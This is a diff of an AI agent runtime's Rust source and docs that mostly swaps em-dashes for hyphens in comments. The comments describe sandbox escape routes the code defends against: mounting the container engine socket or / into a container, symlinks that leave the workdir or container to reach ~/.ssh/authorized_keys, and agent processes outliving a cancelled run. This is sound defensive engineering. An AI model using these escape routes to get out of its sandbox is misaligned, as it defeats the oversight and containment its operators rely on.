@@ -190,7 +190,7 @@ pub fn container_run_argv(spec: &ContainerRunSpec) -> Vec<String> {
 /// argv to run one shell command inside a running container.
 ///
 /// `shell`/`flag` are the shell *inside the container* (typically `sh`/`-c`,
-/// which every image ships) — NOT the host's shell, whose absolute path may not
+/// which every image ships) - NOT the host's shell, whose absolute path may not
 /// exist in the image.
 pub fn container_exec_argv(
     engine: &str,
@@ -236,7 +236,7 @@ pub fn container_rm_argv(engine: &str, name: &str) -> Vec<String> {
 /// **shares the host root filesystem** and can read `~/.ssh` or write
 /// `~/.leviath/providers/*.rhai` exactly as an unsandboxed command could. What
 /// `namespace` actually buys is PID isolation and, with `network = false`, no
-/// connectivity — genuinely useful, and not what most people mean by "sandbox".
+/// connectivity - genuinely useful, and not what most people mean by "sandbox".
 ///
 /// Choose `kind = "container"` when the goal is to contain what an agent can
 /// *reach*. This mode is for bounding what it can *see running* and talk to.
@@ -306,8 +306,8 @@ mod tests {
     }
 
     /// `mounts` comes from a downloaded blueprint. Mounting the engine's own
-    /// socket lets the container create a privileged container on the host —
-    /// a one-line escape — and mounting `/` makes the isolation decorative.
+    /// socket lets the container create a privileged container on the host -
+    /// a one-line escape - and mounting `/` makes the isolation decorative.
     #[test]
     fn forbidden_mounts_are_refused() {
         for path in [
@@ -335,7 +335,7 @@ mod tests {
         }
     }
 
-    /// Ordinary project directories still mount — the denylist is about host
+    /// Ordinary project directories still mount - the denylist is about host
     /// infrastructure, not about making the feature unusable.
     /// The rule is POSIX, not host-native: a container path is a Linux path
     /// wherever the daemon happens to be running. Routing it through

--- a/crates/leviath-sys/src/tty.rs
+++ b/crates/leviath-sys/src/tty.rs
@@ -2,7 +2,7 @@
 //!
 //! OSC52 is a last-resort clipboard mechanism: it asks the *terminal emulator*
 //! to set the system clipboard, so it works over SSH and without any native
-//! clipboard tool. The bytes must reach the real terminal — the controlling
+//! clipboard tool. The bytes must reach the real terminal - the controlling
 //! `/dev/tty` or stdout.
 //!
 //! This module holds the pure, fully-tested pieces: `osc52_sequence` (the
@@ -10,7 +10,7 @@
 //! logic, parameterized over the tty opener and the fallback sink so every
 //! branch is exercised via injected fakes). The genuinely-untestable real-I/O
 //! leaves (opening `/dev/tty`, writing the real `stdout()`) are composed in the
-//! CLI binary — see `real_yank` in `crates/leviath-cli/src/main.rs`.
+//! CLI binary - see `real_yank` in `crates/leviath-cli/src/main.rs`.
 
 use std::fs::File;
 use std::io::{self, Write};
@@ -52,13 +52,13 @@ fn osc52_sequence(text: &str) -> String {
 /// Core OSC52 write logic, parameterized over how to open the TTY and where the
 /// stdout fallback writes, so every branch is exercisable without touching a
 /// real terminal. `pub` so the CLI binary can compose it with the real
-/// `/dev/tty` opener + real `stdout()` (the un-unit-testable leaves) — see
+/// `/dev/tty` opener + real `stdout()` (the un-unit-testable leaves) - see
 /// `real_yank` in `crates/leviath-cli/src/main.rs`.
 ///
 /// The fallback is a `&mut dyn Write` (not a generic `T: Write`) deliberately:
 /// a single vtable dispatch on this cold, human-driven path costs nothing, and
 /// a non-generic function has exactly one coverage-mapping instance instead of
-/// one per caller type — no phantom-uncovered monomorphization for llvm-cov.
+/// one per caller type - no phantom-uncovered monomorphization for llvm-cov.
 pub fn osc52_write_via(
     text: &str,
     open_tty: fn() -> io::Result<File>,
@@ -94,8 +94,8 @@ mod tests {
 
     // Cross-platform stand-ins for a real TTY: a writable temp file (accepts
     // writes) and a read-only temp file (writes to it fail). Using a temp file
-    // rather than `/dev/null` keeps these tests — and thus `osc52_write_via`'s
-    // tty-success and tty-write-fails branches — covered on every OS, not just
+    // rather than `/dev/null` keeps these tests - and thus `osc52_write_via`'s
+    // tty-success and tty-write-fails branches - covered on every OS, not just
     // Unix.
     fn open_temp_writable() -> io::Result<File> {
         std::fs::OpenOptions::new()
@@ -179,7 +179,7 @@ mod tests {
 
     #[test]
     fn write_via_returns_false_when_fallback_flush_fails() {
-        // write succeeds but flush fails — exercises the flush half of the
+        // write succeeds but flush fails - exercises the flush half of the
         // final `write_all(..).is_ok() && flush(..).is_ok()`.
         let mut sink = FlushFailWriter { buf: Vec::new() };
         assert!(!osc52_write_via("hi", open_fails, &mut sink));

--- a/crates/leviath-testkit/src/lib.rs
+++ b/crates/leviath-testkit/src/lib.rs
@@ -5,9 +5,9 @@
 //! inside other packages' gated test suites, and self-gating test scaffolding
 //! forces tests-of-test-helpers with no defect-finding power.
 //!
-//! Before this crate, `AlwaysOnSubscriber` existed as five copy-pasted
-//! `test_support.rs` files (in two silently divergent designs) and the
-//! raw-TCP mock server as nine, drifting independently.
+//! Shared here so each helper has exactly one definition: copy-pasted
+//! per-package `test_support.rs` versions drift silently (`AlwaysOnSubscriber`
+//! reached five copies in two divergent designs, the raw-TCP mock server nine).
 
 use std::sync::{Mutex, OnceLock};
 

--- a/crates/leviath-tools/Cargo.toml
+++ b/crates/leviath-tools/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-tools/src/context.rs
+++ b/crates/leviath-tools/src/context.rs
@@ -2,7 +2,7 @@
 
 use super::*;
 
-/// Context for tool execution — defines the sandbox root.
+/// Context for tool execution - defines the sandbox root.
 pub struct ToolContext {
     /// Absolute working directory. All file operations are confined here.
     pub workdir: PathBuf,
@@ -43,7 +43,7 @@ impl ToolContext {
 ///
 /// A blueprint's `available_tools` may name a built-in by any alias listed here;
 /// it resolves to the canonical tool that is advertised to the model and
-/// executed. This is the single source of truth for aliases — [`names`],
+/// executed. This is the single source of truth for aliases - [`names`],
 /// [`BuiltinTools::execute`], and the daemon's `available_tools` filtering all go
 /// through [`canonical_tool_name`], so adding a row here is all it takes to add
 /// an alias everywhere. Add rows only for genuine synonyms of an existing tool.
@@ -56,7 +56,7 @@ pub const TOOL_ALIASES: &[(&str, &str)] = &[
 
 /// Resolve `name` through [`TOOL_ALIASES`] to its canonical built-in name.
 ///
-/// Returns the input unchanged when it is not an alias — which includes every
+/// Returns the input unchanged when it is not an alias - which includes every
 /// canonical built-in and every MCP tool name, so this is safe to apply to any
 /// tool name before matching it against a definition.
 pub fn canonical_tool_name(name: &str) -> &str {
@@ -70,7 +70,7 @@ pub fn canonical_tool_name(name: &str) -> &str {
 
 /// Redirects shell command execution off the host into a sandbox.
 ///
-/// The default (no executor) runs the command directly on the host — the exact
+/// The default (no executor) runs the command directly on the host - the exact
 /// prior behavior. An implementor (the daemon's `SandboxManager`) returns a
 /// [`tokio::process::Command`] that runs `command` inside a container or Linux
 /// namespace instead. The implementor owns any per-stage sandbox state, so the

--- a/crates/leviath-tools/src/defs.rs
+++ b/crates/leviath-tools/src/defs.rs
@@ -106,7 +106,7 @@ impl BuiltinTools {
             },
             Tool {
                 name: "present_for_review".to_string(),
-                description: "Present a document, plan, or report to the user for review. The agent run will pause and the dashboard will display the document prominently. Use this when you want the user to read and approve something before you continue — for example, a technical design, an implementation plan, or a summary report. The user can provide feedback or simply acknowledge to continue.".to_string(),
+                description: "Present a document, plan, or report to the user for review. The agent run will pause and the dashboard will display the document prominently. Use this when you want the user to read and approve something before you continue - for example, a technical design, an implementation plan, or a summary report. The user can provide feedback or simply acknowledge to continue.".to_string(),
                 parameters: json!({
                     "type": "object",
                     "properties": {
@@ -124,7 +124,7 @@ impl BuiltinTools {
             },
             Tool {
                 name: "ask_user_text".to_string(),
-                description: "Ask the user a free-form question and wait for their written answer. The run pauses until they respond. Use this when you need clarification, missing information, or a specific detail only the user knows — decide for yourself when this is necessary; don't ask about things you can figure out on your own.".to_string(),
+                description: "Ask the user a free-form question and wait for their written answer. The run pauses until they respond. Use this when you need clarification, missing information, or a specific detail only the user knows - decide for yourself when this is necessary; don't ask about things you can figure out on your own.".to_string(),
                 parameters: json!({
                     "type": "object",
                     "properties": {
@@ -269,7 +269,7 @@ impl BuiltinTools {
             },
             Tool {
                 name: "context_list".to_string(),
-                description: "List available sections of your context window with their current usage — section names, token counts, and number of entries. Use this to see what's available and what you've already stored.".to_string(),
+                description: "List available sections of your context window with their current usage - section names, token counts, and number of entries. Use this to see what's available and what you've already stored.".to_string(),
                 parameters: json!({
                     "type": "object",
                     "properties": {

--- a/crates/leviath-tools/src/exec.rs
+++ b/crates/leviath-tools/src/exec.rs
@@ -31,9 +31,9 @@ impl BuiltinTools {
     /// `write_file` calls `create_dir_all`, which would otherwise silently
     /// resurrect a workspace an external harness deleted mid-run - leaving the
     /// agent writing into an empty tree that no longer resembles the checkout it
-    /// reasoned about, and masking the loss from the runtime's health check
-    /// (issue #107). Creating *sub*directories inside a live workspace is
-    /// untouched; only a missing workspace root is refused.
+    /// reasoned about, and masking the loss from the runtime's health check.
+    /// Creating *sub*directories inside a live workspace is untouched; only a
+    /// missing workspace root is refused.
     pub(crate) fn ensure_workspace(&self) -> Result<(), String> {
         if std::fs::metadata(&self.ctx.workdir).is_ok_and(|m| m.is_dir()) {
             return Ok(());

--- a/crates/leviath-tools/src/exec.rs
+++ b/crates/leviath-tools/src/exec.rs
@@ -8,7 +8,7 @@ impl BuiltinTools {
     pub async fn execute(&self, name: &str, args: Value) -> String {
         let canonical = canonical_tool_name(name);
         // A tool whose platform capabilities aren't met never advertises, but a
-        // caller could still dispatch to it directly — reject it here too.
+        // caller could still dispatch to it directly - reject it here too.
         if !self.available(canonical) {
             return format!("[error] tool '{}' is not available on this platform", name);
         }
@@ -29,7 +29,7 @@ impl BuiltinTools {
     /// Refuse to create anything when the working directory itself is gone.
     ///
     /// `write_file` calls `create_dir_all`, which would otherwise silently
-    /// resurrect a workspace an external harness deleted mid-run — leaving the
+    /// resurrect a workspace an external harness deleted mid-run - leaving the
     /// agent writing into an empty tree that no longer resembles the checkout it
     /// reasoned about, and masking the loss from the runtime's health check
     /// (issue #107). Creating *sub*directories inside a live workspace is
@@ -59,7 +59,7 @@ impl BuiltinTools {
     ///
     /// That mattered most where the containment is load-bearing. Leviath's file
     /// tools run **on the host over the bind-mounted workdir** even when the
-    /// stage's `shell` is confined to a container — so a symlink the agent
+    /// stage's `shell` is confined to a container - so a symlink the agent
     /// created inside the container escaped the container through the file
     /// tools. It also matters for a freshly cloned repository, which is exactly
     /// what a coding agent operates on and which can carry a checked-in symlink
@@ -331,8 +331,8 @@ impl BuiltinTools {
     /// for testing.
     ///
     /// `shell_exists` is a trait object (`&dyn Fn(&str) -> bool`) rather
-    /// than `impl Fn(&str) -> bool` so every caller -- production's real
-    /// `Path::exists` closure and each test's distinct closure -- shares
+    /// than `impl Fn(&str) -> bool` so every caller - production's real
+    /// `Path::exists` closure and each test's distinct closure - shares
     /// exactly ONE monomorphization of this function instead of one per
     /// closure type (this function was a confirmed generic-monomorphization
     /// coverage-attribution artifact: every source position had a covered
@@ -346,7 +346,7 @@ impl BuiltinTools {
             && (shell.ends_with("/zsh") || shell.ends_with("/bash") || shell.ends_with("/sh"))
             && shell_exists(&shell)
         {
-            // Only trust `$SHELL` when it actually exists — a stale or
+            // Only trust `$SHELL` when it actually exists - a stale or
             // sandbox-missing `$SHELL` (e.g. `/bin/zsh` in an environment that
             // doesn't ship it) otherwise made every shell call fail to spawn.
             // When it's missing, fall through to the known-path fallback list.
@@ -388,7 +388,7 @@ impl BuiltinTools {
 
         // When a sandbox executor is attached, it builds a command that runs
         // inside a container / namespace (still targeting `workdir`); otherwise
-        // run the shell directly on the host — the exact prior behavior.
+        // run the shell directly on the host - the exact prior behavior.
         let mut cmd = match &self.shell_executor {
             Some(executor) => executor.build_command(shell, flag, command, &workdir),
             None => {
@@ -403,7 +403,7 @@ impl BuiltinTools {
         // cancelled agent (or an elapsed timeout, which drops the future the
         // same way) left its shell running: the run vanished from every listing
         // while its command carried on writing to the workspace. `kill_on_drop`
-        // fixes the shell — but only the shell. Anything the shell itself
+        // fixes the shell - but only the shell. Anything the shell itself
         // started (`sleep 400 && …`) is a *grandchild*, gets reparented to init,
         // and keeps running. Putting the shell in its own process group and
         // signalling the group on drop takes the whole tree down with it.

--- a/crates/leviath-tools/src/lib.rs
+++ b/crates/leviath-tools/src/lib.rs
@@ -169,7 +169,7 @@ mod tests {
     #[tokio::test]
     async fn ask_user_tools_not_handled_by_builtin_execute() {
         // ask_user_* tools are intercepted upstream (worker.rs/foreground.rs),
-        // exactly like present_for_review — execute() must never run them.
+        // exactly like present_for_review - execute() must never run them.
         let dir = std::env::temp_dir();
         let tools = make_tools(&dir);
         for name in [
@@ -406,7 +406,7 @@ mod tests {
         assert!(out.contains("[error]"), "got: {out}");
     }
 
-    /// A write through an escaping symlink is refused too — this was the path
+    /// A write through an escaping symlink is refused too - this was the path
     /// that could overwrite `~/.ssh/authorized_keys`.
     #[cfg(unix)]
     #[tokio::test]
@@ -428,7 +428,7 @@ mod tests {
         );
     }
 
-    /// A symlink that stays *inside* the workdir keeps working — the rule is
+    /// A symlink that stays *inside* the workdir keeps working - the rule is
     /// about where the path lands, not whether a symlink was involved. Agents
     /// operate on real repositories, which contain plenty of internal symlinks.
     #[cfg(unix)]
@@ -516,7 +516,7 @@ mod tests {
         // Issue #107: an external harness deletes the workspace mid-run.
         // `create_dir_all` would happily recreate it and let the agent write
         // into an empty tree that no longer resembles the checkout it reasoned
-        // about — and the runtime's health check, which just stats the workdir,
+        // about - and the runtime's health check, which just stats the workdir,
         // would never see it was gone.
         let dir = tempfile::tempdir().unwrap();
         let workdir = dir.path().join("workspace");
@@ -566,7 +566,7 @@ mod tests {
         // request then decomposes into exactly `[Normal(workdir), ParentDir,
         // ParentDir, ...]`; the first `..` pops the single workdir component and
         // the second `..` calls `normalized.pop()` on an *empty* accumulator,
-        // which returns `false` -- firing the "escapes the working directory"
+        // which returns `false` - firing the "escapes the working directory"
         // bail deterministically on every OS.
         //
         // (An empty "" workdir is not portable here: on Windows `canonicalize("")`
@@ -822,7 +822,7 @@ mod tests {
         let dir = tempfile::tempdir().unwrap();
         let tools = make_tools(dir.path());
         // Build the absolute path from the tool's own (canonicalized) workdir
-        // rather than `dir.path()` directly — on macOS `/tmp`/`/var` are
+        // rather than `dir.path()` directly - on macOS `/tmp`/`/var` are
         // symlinks, so the two can differ even though they're the same place.
         let abs = tools.ctx.workdir.join("inside.txt");
         let result = tools.resolve(abs.to_str().unwrap()).unwrap();
@@ -1007,7 +1007,7 @@ mod tests {
     }
 
     /// A `ShellExecutor` that ignores the requested command and instead runs a
-    /// fixed marker command — proof that shell execution is routed through it.
+    /// fixed marker command - proof that shell execution is routed through it.
     struct RedirectExecutor;
     impl ShellExecutor for RedirectExecutor {
         fn build_command(
@@ -1101,7 +1101,7 @@ mod tests {
     /// A timed-out (or cancelled) command takes its *grandchildren* with it.
     ///
     /// `kill_on_drop` only reaps the shell. Anything the shell started is
-    /// reparented to init and keeps running — a cancelled agent's `sleep`
+    /// reparented to init and keeps running - a cancelled agent's `sleep`
     /// outliving the run that spawned it. Verified by writing a marker file
     /// after a delay: if the grandchild survived, the marker appears.
     #[cfg(unix)]
@@ -1163,7 +1163,7 @@ mod tests {
     // ── detect_shell ──────────────────────────────────────────────────────
 
     /// Windows' `detect_shell()` branch is a plain, unconditional constant
-    /// return (no env/filesystem dependence to inject) -- the
+    /// return (no env/filesystem dependence to inject) - the
     /// platform-agnostic `detect_shell_returns_valid_shell` test below
     /// already exercises it on Windows CI, but this asserts the exact
     /// documented return value directly.
@@ -1190,7 +1190,7 @@ mod tests {
     /// Forces `detect_shell()` to exercise the real `shell_exists` closure by
     /// temporarily setting $SHELL to an unrecognized path, causing the candidate
     /// loop (and the closure) to be reached. `temp_env::with_var` sets the var,
-    /// runs the closure, and restores it -- serialized against every other
+    /// runs the closure, and restores it - serialized against every other
     /// temp-env test process-wide, so no hand-rolled lock is needed.
     #[cfg(not(windows))]
     #[test]
@@ -1212,7 +1212,7 @@ mod tests {
         );
     }
 
-    // ── detect_shell_impl() — inject env and filesystem for full branch coverage ──
+    // ── detect_shell_impl() - inject env and filesystem for full branch coverage ──
 
     #[cfg(not(windows))]
     #[test]
@@ -1253,7 +1253,7 @@ mod tests {
     fn detect_shell_impl_falls_back_when_env_shell_is_missing() {
         // Regression for #79: `$SHELL` is a recognized shell name but does not
         // exist on disk (a stale or sandbox-missing `/bin/zsh`). It must NOT be
-        // returned — fall through to an available fallback instead of failing
+        // returned - fall through to an available fallback instead of failing
         // every shell call with "No such file or directory".
         let (shell, flag) =
             BuiltinTools::detect_shell_impl(Some("/bin/zsh".to_string()), &|s| s == "/bin/sh");
@@ -1274,7 +1274,7 @@ mod tests {
     #[cfg(not(windows))]
     #[test]
     fn detect_shell_impl_skips_missing_candidates_and_finds_zsh() {
-        // bash paths return false; /bin/zsh exists — covers shell_exists false branch
+        // bash paths return false; /bin/zsh exists - covers shell_exists false branch
         let (shell, flag) = BuiltinTools::detect_shell_impl(None, &|s| s == "/bin/zsh");
         assert_eq!(shell, "/bin/zsh");
         assert_eq!(flag, "-c");

--- a/crates/leviath-tools/src/lib.rs
+++ b/crates/leviath-tools/src/lib.rs
@@ -391,8 +391,8 @@ mod tests {
         std::os::unix::fs::symlink("/", workdir.join("link")).unwrap();
         let tools = make_tools(&workdir);
 
-        // Precondition: this is textually inside the workdir, so the lexical
-        // `starts_with` containment the old code relied on would have passed it.
+        // Precondition: this is textually inside the workdir, so a lexical
+        // `starts_with` containment check alone would pass it.
         // Built from `ctx.workdir` rather than `workdir` because the context
         // canonicalizes (on macOS `/var` becomes `/private/var`).
         let normalized = tools.ctx.workdir.join("link/etc/hosts");

--- a/crates/leviath-tools/src/platform.rs
+++ b/crates/leviath-tools/src/platform.rs
@@ -5,7 +5,7 @@ use super::*;
 /// Put `cmd` in its own process group, so the whole command tree can be
 /// signalled as one. `leviath_sys::configure_detached` does this for a
 /// `std::process::Command`; the tool lane uses tokio's, which has its own
-/// (Unix-only) setter. A no-op where the platform has no process groups —
+/// (Unix-only) setter. A no-op where the platform has no process groups -
 /// there, killing the direct child is all that exists.
 pub fn own_process_group(cmd: &mut Command) {
     #[cfg(unix)]
@@ -17,8 +17,8 @@ pub fn own_process_group(cmd: &mut Command) {
 /// SIGKILLs a shell's whole process group when dropped.
 ///
 /// `kill_on_drop` reaps the shell itself; this reaps what the shell started.
-/// Held for the duration of one shell tool call, so it fires on every exit path
-/// — normal completion (where the group is already gone and the signal is a
+/// Held for the duration of one shell tool call, so it fires on every exit path -
+/// normal completion (where the group is already gone and the signal is a
 /// harmless no-op), timeout, and the future being dropped because the agent was
 /// cancelled.
 pub struct ProcessGroupReaper(pub u32);
@@ -35,7 +35,7 @@ impl Drop for ProcessGroupReaper {
 /// Each built-in declares the capabilities it requires (see
 /// [`tool_required_capabilities`]); the current platform declares what it
 /// provides (see [`PlatformCapabilities`]). A tool whose requirements aren't
-/// met by the platform simply doesn't register — it's dropped from
+/// met by the platform simply doesn't register - it's dropped from
 /// advertisement, name-recognition, and dispatch. This lets platform-specific
 /// tools (like `shell`, which spawns OS processes) coexist without per-tool
 /// `#[cfg]` gates or one-off boolean flags.
@@ -86,7 +86,7 @@ impl PlatformCapabilities {
     ///
     /// Only desktop targets are built today, so this resolves to
     /// [`desktop`](Self::desktop). A future mobile/wasm target adds a `cfg` arm
-    /// here returning [`mobile`](Self::mobile) — every built-in then auto-filters
+    /// here returning [`mobile`](Self::mobile) - every built-in then auto-filters
     /// against it with no other change.
     pub fn current() -> Self {
         Self::desktop()
@@ -121,7 +121,7 @@ impl Default for PlatformCapabilities {
 ///
 /// Keyed by *canonical* tool name (resolve aliases via [`canonical_tool_name`]
 /// first). An empty slice means the tool is platform-agnostic and always
-/// available — this covers the runtime-handled tools (`present_for_review`,
+/// available - this covers the runtime-handled tools (`present_for_review`,
 /// `ask_user_*`, `edit_document`, `context_*`) which touch neither the OS
 /// process table nor the filesystem directly.
 pub fn tool_required_capabilities(canonical_name: &str) -> &'static [ToolCapability] {

--- a/deny.toml
+++ b/deny.toml
@@ -31,7 +31,7 @@ ignore = [
     #   { id = "RUSTSEC-0000-0000", reason = "why this is acceptable here" },
     # Every entry needs a reason. An ignore with no justification is a silent
     # acceptance of risk, which is what this file exists to prevent.
-    # `paste` is unmaintained (archived by its author), not vulnerable — the
+    # `paste` is unmaintained (archived by its author), not vulnerable - the
     # advisory reports abandonment, not a defect. It reaches us through ratatui
     # 0.29 and tui-textarea, neither of which we control, and it is a proc-macro:
     # it runs at build time and contributes no code to the shipped binary.
@@ -74,11 +74,11 @@ confidence-threshold = 0.9
 multiple-versions = "warn"
 wildcards = "deny"
 # Leviath's own crates depend on each other by `path` with no version, which
-# reads as a wildcard. That is how a workspace is supposed to work — these are
-# not third-party requirements — so path deps are exempt and every *external*
+# reads as a wildcard. That is how a workspace is supposed to work - these are
+# not third-party requirements - so path deps are exempt and every *external*
 # wildcard still fails.
 allow-wildcard-paths = true
-# Crates that must never appear, with the reason. Empty for now — this is the
+# Crates that must never appear, with the reason. Empty for now - this is the
 # place to record "we decided against X" so the decision survives.
 deny = []
 

--- a/docs/design/setup-wizard.md
+++ b/docs/design/setup-wizard.md
@@ -1,4 +1,4 @@
-# `lev setup` — the onboarding wizard
+# `lev setup` - the onboarding wizard
 
 ## Why it was rebuilt
 
@@ -9,7 +9,7 @@ plaintext, touched about eight of `Config`'s twenty-odd fields, took
 or agent blueprints. It ended by printing *"All API keys look valid"* on the
 strength of a `key.starts_with("sk-ant-")` check that never touched the network.
 
-A fresh install came out the other side with a config file and no agents — the
+A fresh install came out the other side with a config file and no agents - the
 ten blueprints under `agents/` shipped only in the git repo, and `lev list`
 looked for them in a directory beside the executable that no real install has.
 
@@ -32,8 +32,8 @@ lands in a `SetupPlan`; `plan::apply` is the only code that writes. The
 `--non-interactive` flag path builds the same struct, and a future mobile or web
 host would be a third builder with nothing downstream changing.
 
-That split is also what makes the interesting logic — what actually changes,
-what to warn about, which blueprint needs updating — testable without a
+That split is also what makes the interesting logic - what actually changes,
+what to warn about, which blueprint needs updating - testable without a
 terminal.
 
 ```mermaid
@@ -83,7 +83,7 @@ flowchart LR
 ## The flow
 
 Eight screens. The two discovery-driven ones are skipped when they have nothing
-to show — nobody should press Enter through *"no MCP servers found"* on a clean
+to show - nobody should press Enter through *"no MCP servers found"* on a clean
 machine.
 
 ```mermaid
@@ -132,7 +132,7 @@ stateDiagram-v2
 | **MCP servers** | Grouped by harness, with the project scope, name collisions, and inline secrets flagged. |
 | **Review** | A diff against the current file, plus warnings, then write. |
 
-**Keys** — `↑↓`/`kj` move · `←→`/`hl` change a choice · `space` toggle ·
+**Keys** - `↑↓`/`kj` move · `←→`/`hl` change a choice · `space` toggle ·
 `enter` edit or go on · `tab`/`esc` next/previous · `v` re-check · `o` signup
 page · `Ctrl-R` reveal · `Ctrl-S` write from anywhere · `?` help ·
 `q`/`Ctrl-C` quit.
@@ -167,7 +167,7 @@ Nine sources, four families of format:
 
 Rather than nine near-identical structs, one tolerant entry parser accepts the
 union of the field names and each wrapper normalises into it. Unknown fields are
-dropped rather than rejected — these files are written by tools that add keys on
+dropped rather than rejected - these files are written by tools that add keys on
 their own schedule.
 
 Three things worth knowing:
@@ -192,7 +192,7 @@ connect time and are not flagged.
 
 `build.rs` walks the workspace's `agents/` directory and generates a
 `BUNDLED_AGENTS` table whose file contents are `include_str!`s of the real files
-— 23 files, ~170 KB of text. A missing `agents/` directory emits an empty table
+- 23 files, ~170 KB of text. A missing `agents/` directory emits an empty table
 rather than failing the build (the shape a packaged crate sees); `bundled`'s own
 invariant test then catches an accidentally-empty catalog loudly.
 
@@ -213,7 +213,7 @@ backs `--no-verify`, `LiveVerifier` is instantiated only by `main.rs`, and the
 wizard never calls a provider directly. Checks run on a background task and land
 through a channel, so the UI never blocks on the network.
 
-A failure is always a warning and never a blocker — an offline laptop or a
+A failure is always a warning and never a blocker - an offline laptop or a
 provider outage must not stop someone finishing setup. Errors are mapped to what
 the user should actually do, distinguishing cases that look alike: a `429` means
 the key *works*, a `403` means it is real but lacks access, and an unrecognised
@@ -230,8 +230,8 @@ as a whole:
   starting ratatui on a pipe.
 - **Scanning a home directory** for other tools' config is desktop-shaped. A
   host with no such layout simply finds no sources and the step is skipped.
-- **The real environment** — `std::env`, `dirs::config_dir()`, a real browser,
-  the live verifier — is assembled in the binary. Nothing in the library reaches
+- **The real environment** - `std::env`, `dirs::config_dir()`, a real browser,
+  the live verifier - is assembled in the binary. Nothing in the library reaches
   it, so no test can either.
 - The one genuine per-OS branch (the XDG-vs-OS config root) is `#[cfg]`-gated in
   a single place, following `daemon_service`'s precedent.
@@ -246,7 +246,7 @@ functions per instantiation, so a loop monomorphizing over two backend types
 produces two region reports with arms covered in only one.
 
 Rendering tests assert on the drawn text, not merely that drawing did not panic
-— which is how the masking, redaction, and secret-warning behaviour is pinned.
+- which is how the masking, redaction, and secret-warning behaviour is pinned.
 
 **CI green is not evidence the wizard works.** Two defaults passed every unit
 test and were visibly wrong the first time it ran under a pty: the Ollama

--- a/docs/rhai-providers.md
+++ b/docs/rhai-providers.md
@@ -1,7 +1,7 @@
 # Rhai script providers
 
 Add support for any LLM API by dropping a `.rhai` script into
-`~/.leviath/providers/` — no recompile, and no restart.
+`~/.leviath/providers/` - no recompile, and no restart.
 
 A `RhaiProvider` Rust wrapper implements the full `Provider` trait. Your script
 only does **format mapping** (Leviath's request → the API's HTTP body, and the
@@ -21,13 +21,13 @@ whenever the file changes** (the file's mtime is checked on each use). So:
 - a broken script is skipped with a warning (selection falls through to the next
   model), and starts working again once you fix the file.
 
-Scripts are only compiled/run when an agent actually references the name — the
+Scripts are only compiled/run when an agent actually references the name - the
 daemon never scans-and-executes every dropped file at startup.
 
 ## Discovery & config
 
 The provider name is the script's filename stem (`groq.rhai` → `groq`) or the
-key of a `[model_providers.<name>]` table. A config table is **optional** — it
+key of a `[model_providers.<name>]` table. A config table is **optional** - it
 only supplies overrides:
 
 ```toml
@@ -52,7 +52,7 @@ tokens_per_minute   = 100000
 **Required**
 
 ```rhai
-// Runs once when the provider loads. Runs OFFLINE — no HTTP host functions are
+// Runs once when the provider loads. Runs OFFLINE - no HTTP host functions are
 // available here. Return a state map persisted across calls.
 fn initialize(config) -> Map
 
@@ -70,7 +70,7 @@ fn inference(state, request) -> Map
 **Optional**
 
 ```rhai
-// Streaming. `on_chunk` is a function pointer — call it with `on_chunk.call(#{...})`.
+// Streaming. `on_chunk` is a function pointer - call it with `on_chunk.call(#{...})`.
 // Each chunk: { delta, tool_calls: [{index, id, name, arguments_delta}],
 //               tokens: {...}, finish_reason }
 fn stream(state, request, on_chunk)
@@ -105,7 +105,7 @@ fn list_models(state) -> Array   // [{ id, display_name, max_context_tokens, max
   `"anthropic"`, `"gemini"`, or `"general"`.
 
 Rate limiting, request timeouts, retry, and 429/5xx classification are applied
-by the Rust wrapper around these calls — you don't implement them.
+by the Rust wrapper around these calls - you don't implement them.
 
 ## Error handling
 

--- a/rust-toolchain.toml
+++ b/rust-toolchain.toml
@@ -6,7 +6,7 @@
 # committed, this is the other half of a reproducible build: same commit, same
 # lockfile, same toolchain, same binary.
 #
-# Bump deliberately — its own commit, CI green on all three OSes — rather than
+# Bump deliberately - its own commit, CI green on all three OSes - rather than
 # by drifting.
 [toolchain]
 channel = "1.97.0"

--- a/xtask/src/coverage.rs
+++ b/xtask/src/coverage.rs
@@ -1,9 +1,9 @@
-//! Coverage gate — runs `cargo llvm-cov` per workspace package and enforces a
+//! Coverage gate - runs `cargo llvm-cov` per workspace package and enforces a
 //! hard 100% on regions, lines, and functions using llvm-cov's own
 //! `--fail-under-*` thresholds. No custom parsing, merging, or aggregation.
 //!
 //! **Why per-package (and not `--workspace`).** `-C instrument-coverage` emits a
-//! coverage record for *every* function in *every* binary that links it —
+//! coverage record for *every* function in *every* binary that links it -
 //! including binaries that never call it (rustc instruments unused functions).
 //! A workspace has many test binaries, and a `pub fn` from one crate is linked
 //! into every other crate's test binary. When `cargo llvm-cov --workspace`
@@ -12,14 +12,14 @@
 //! OS-dependent, so it can't be closed with a test). Measuring one package at a
 //! time keeps few binaries in each profile, where llvm-cov counts accurately.
 //! This is the standard granularity for reliable Rust coverage, not a
-//! workaround — see <https://github.com/llvm/llvm-project/issues/119558>.
+//! workaround - see <https://github.com/llvm/llvm-project/issues/119558>.
 //!
 //! Each package is gated by a single `cargo llvm-cov --package <pkg>
 //! --fail-under-{lines,functions,regions} 100` invocation, which also writes a
 //! browsable HTML report to `coverage/html/<pkg>`. `--fail-under-* 100` on the
 //! package total is equivalent to a per-file 100% gate (a total can only be
-//! 100% if every file is). `src/main.rs` — the un-unit-tested bin composition
-//! root — is excluded via `--ignore-filename-regex`.
+//! 100% if every file is). `src/main.rs` - the un-unit-tested bin composition
+//! root - is excluded via `--ignore-filename-regex`.
 //!
 //! Branch coverage is intentionally not collected: `cargo llvm-cov --branch`
 //! reliably SIGSEGVs on the same open upstream LLVM bug linked above.
@@ -28,7 +28,7 @@ use anyhow::{Context, Result};
 
 // ── Runner trait (injectable for testing) ────────────────────────────────────
 
-/// Abstraction over subprocess execution — inject a mock in tests.
+/// Abstraction over subprocess execution - inject a mock in tests.
 pub trait Runner {
     /// Run `cargo <args>` and return whether it exited successfully.
     fn cargo(&self, args: &[&str]) -> Result<bool>;
@@ -46,7 +46,7 @@ impl Runner for RealRunner {
         Ok(std::process::Command::new("cargo")
             .args(args)
             .status()
-            .expect("failed to spawn cargo — is cargo installed in PATH?")
+            .expect("failed to spawn cargo - is cargo installed in PATH?")
             .success())
     }
 
@@ -54,7 +54,7 @@ impl Runner for RealRunner {
